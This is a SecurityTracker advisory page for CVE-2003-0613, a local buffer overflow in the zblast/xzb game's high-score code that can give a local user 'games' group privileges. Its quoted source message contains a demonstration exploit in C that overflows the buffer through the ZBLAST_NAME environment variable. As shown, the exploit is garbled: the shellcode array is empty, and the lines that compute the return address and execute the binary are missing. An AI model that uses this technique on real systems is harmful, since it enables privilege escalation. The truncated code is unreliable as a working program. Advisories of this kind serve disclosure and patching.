Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Game)  >   zblast Vendors:   Marks, Russell
zblast Game Environment Variable Buffer Overflow Lets Local Users Gain Elevated Privileges
SecurityTracker Alert ID:  1006943
SecurityTracker URL:
CVE Reference:   CVE-2003-0613   (Links to External Site)
Updated:  Aug 9 2003
Original Entry Date:  Jun 6 2003
Impact:   Execution of arbitrary code via local system, User access via network
Exploit Included:  Yes  
Version(s): 1.2
Description:   A buffer overflow vulnerability was reported in the 'zblast' game software. A local user can obtain elevated privileges on the system.

v9 reported that a local user can cause arbitary code to be executed by the X version of zblast when the game writes high scores to the high scores file. The flaw resides in the 'hiscores.c' file, where the ZBLAST_NAME, USER, and LOGNAME environment variables are copied in to a fixed size buffer of 1024 characters without checking to ensure that the copied length will fit within the allocated buffer.

A local user can obtain 'games' user privileges.

A demonstration exploit is provided in the Source Message.

Impact:   A local user can execute arbitrary code with 'games' user privileges.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Aug 9 2003 (Debian Issues Fix) zblast Game Environment Variable Buffer Overflow Lets Local Users Gain Elevated Privileges
Debian has released a fix.

 Source Message Contents

Subject:  linux)zblast/xzb[v1.2]: local buffer overflow. (games)

note much explaination needed, simple overflow.

vade79 -> -> fakehalo

-- xxzb.c --

/* (linux)zblast/xzb[v1.2]: local buffer overflow.
   by: v9[].

   zblast/xzb is a common svgalib/X game, included on's program downloads:

   this exploit gives uid=20(games), using the X version
   of zblast.  both versions are based of the same code,
   except for the fact privileges are only dropped in the
   svgalib version:
    zblast.c:2095:#ifndef USE_X
    zblast.c:2096:setuid(getuid()); setgid(getgid());

   now for the point/fun of this.  you have to make it to
   the high scores in the game to exploit this :), as it's
   done when writing the high scores.  although, if there
   is a blank spot in the high scores you can just make
   it happen by typing <enter>, then <esc>.

   file stats(from install):
    -r-xr-sr-x root games /usr/local/games/xzb
    -r-sr-sr-x root games /usr/local/games/zblast

   the bug itself(simple enough):
    hiscore.c:124:void writescore(int score)
    hiscore.c:129:char name[1024],*ptr;
    hiscore.c:148:if(ptr!=NULL) strcpy(name,ptr);
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define PATH "/usr/local/games/xzb" /* X binary.     */
#define DEFAULT_OFFSET 500 /* for typical small env. */

static char exec[]=

long esp(void){__asm__("movl %esp,%eax");}

int main(int argc,char **argv){
 char buf[1040];
 int i,offset;
 long ret;

 printf("(*)zblast/xzb[v1.2]: local buffer overflow.\n");
 printf("(*)by: / fakehalo.\n");


 printf("return address: 0x%lx, offset: %d.\n",ret,offset);
 /* alignment will never need to be changed. */
 for(i=0;i<sizeof(buf);i+=4){*(long *)&buf[i]=ret;}
 setenv("ZBLAST_NAME",buf,1); /* or $USER/$LOGNAME. */
  printf("* failed to execute %s.\n",PATH);


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, LLC